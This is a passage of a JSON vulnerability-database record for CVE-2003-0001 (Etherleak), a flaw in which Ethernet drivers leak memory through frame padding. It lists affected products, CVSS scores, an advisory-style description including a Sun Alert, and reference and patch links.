        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0"
      },
      {
        "model": "m. wright simplestmail.cgi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "leif",
        "version": "2.2.18"
      },
      {
        "model": "m. wright simplestmail.cgi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "leif",
        "version": "2.0.22"
      },
      {
        "model": "jetdirect j6035a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.04"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "hp-ux series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20800"
      },
      {
        "model": "hp-ux series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20700"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.20"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.19"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.19"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.19"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.18"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.18"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.18"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.17"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.17"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.17"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.16"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.16"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.16"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.15"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.15"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.15"
      },
      {
        "model": "irix m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.3"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.2"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "aix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "clavister",
        "version": "8.0"
      },
      {
        "model": "pix firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "515"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "BID",
        "id": "6535"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "@stake advisories\u203b advisories@atstake.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2003-0001",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2003-0001",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2003-0001",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#412115",
            "trust": 0.8,
            "value": "13.50"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200301-027",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2003-0001",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak. The network device driver fills in packet data for less than 46 bytes. The Ethernet standard (IEEE 802.3) defines that the minimum field of a packet is 46 bytes. If a higher layer protocol such as IP provides less than 46 bytes, the device driver must fill the data segment to meet the minimum frame size specification specified by IEEE 802. The padding value is generally NULL data. However, many Ethernet device drivers do not operate correctly in accordance with the standard implementation. The data is padded without using NULL bytes, and the previously transmitted frame data is reused for padding. Since the Ethernet frame buffer is allocated in the kernel memory space, some system sensitive information can be obtained by analyzing these padding data.  Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact.  Consequently, this data may be transmitted within frames across Ethernet segments. \nCisco has stated that the IOS 12.1 and 12.2 trains are not affected. \nNational Semiconductor Ethernet controller chips are not vulnerable to this issue. \n\n   This issue is described in CERT Vulnerability VU#412115 (see\n   http://www.kb.cert.org/vuls/id/412115 and\n   http://www.kb.cert.org/vuls/id/JPLA-5BGNYP). \n\n2. Contributing Factors\n\n   This issue can occur in the following releases:\n\n   SPARC Platform\n     * Solaris 2.6 without patch 105181-35\n     * Solaris 7 without patch 112604-02\n     * Solaris 8 without patch 112609-02\n     * Solaris 9 without patch 115172-01\n\n   Note: The Am7990 (\"LANCE\") Ethernet driver le(7D) is for SPARC\n   platforms only, thus x86 platforms are not affected. \n\n   This issue only occurs on SPARC systems that utilize the Am7990\n   (\"LANCE\") Ethernet driver (le(7D)). \n\n   To determine if the Am7990 Ethernet driver is installed on your\n   system, run the following command:\n    $ ifconfig -a\n    le0: flags=1000849\u003cUP,LOOPBACK,RUNNING,MULTICAST,IPv4\u003e mtu 8232 index 1\n            inet 127.0.0.0 netmask ff000000\n\n   Any reference to \"le0\" would indicate an open Lance Ethernet (le)\n   interface. \n\n3. Symptoms\n\n   There are no predictable symptoms that would show the described issue\n   has been exploited. \n   SOLUTION SUMMARY:\n\n4. Relief/Workaround\n\n   There is no workaround for this issue. Please see \"Resolution\" section\n   below. \n\n5. Resolution\n\n   This issue is addressed in the following releases:\n\n   SPARC Platform\n     * Solaris 2.6 with patch 105181-35 or later\n     * Solaris 7 with patch 112604-02 or later\n     * Solaris 8 with patch 112609-02 or later\n     * Solaris 9 with patch 115172-01 or later\n\n   This Sun Alert notification is being provided to you on an \"AS IS\"\n   basis. This Sun Alert notification may contain information provided by\n   third parties. The issues described in this Sun Alert notification may\n   or may not impact your system(s). Sun makes no representations,\n   warranties, or guarantees as to the information contained herein. ANY\n   AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION\n   WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR\n   NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT\n   YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT,\n   INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE\n   OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. \n   This Sun Alert notification contains Sun proprietary and confidential\n   information. It is being provided to you pursuant to the provisions of\n   your agreement to purchase services from Sun, or, if you do not have\n   such an agreement, the Sun.com Terms of Use. This Sun Alert\n   notification may only be used for the purposes contemplated by these\n   agreements. \n\n   Copyright 2000-2003 Sun Microsystems, Inc., 4150 Network Circle, Santa\n   Clara, CA 95054 U.S.A. All rights reserved. \n     _________________________________________________________________\n     _________________________________________________________________\n\n   APPLIES TO:\n   ATTACHMENTS:\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "BID",
        "id": "6535"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "PACKETSTORM",
        "id": "31775"
      }
    ],
    "trust": 3.33
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=26076",
        "trust": 0.3,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#412115",
        "trust": 3.7
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001",
        "trust": 3.4
      },
      {
        "db": "SECTRACK",
        "id": "1031583",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1040185",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "9962",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "7996",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "6535",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1006959",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0235",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "26076",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "121969",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "31775",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "BID",
        "id": "6535"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "PACKETSTORM",
        "id": "31775"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "id": "VAR-200301-0002",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:07:38.894000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HPSBUX0305-261",
        "trust": 0.8,
        "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?docid=hpsbux0305-261"
      },
      {
        "title": "HPSBUX0305-261",
        "trust": 0.8,
        "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/hp-ux/hpsbux0305-261.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - January 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html"
      },
      {
        "title": "RHSA-2003:088",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2003-088.html"
      },
      {
        "title": "RHSA-2003:025",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2003-025.html"
      },
      {
        "title": "January 2015 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update"
      },
      {
        "title": "57040",
        "trust": 0.8,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-57040-1"
      },
      {
        "title": "57040",
        "trust": 0.8,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-57040-3"
      },
      {
        "title": "Sun Cobalt RaQ 550 Patches",
        "trust": 0.8,
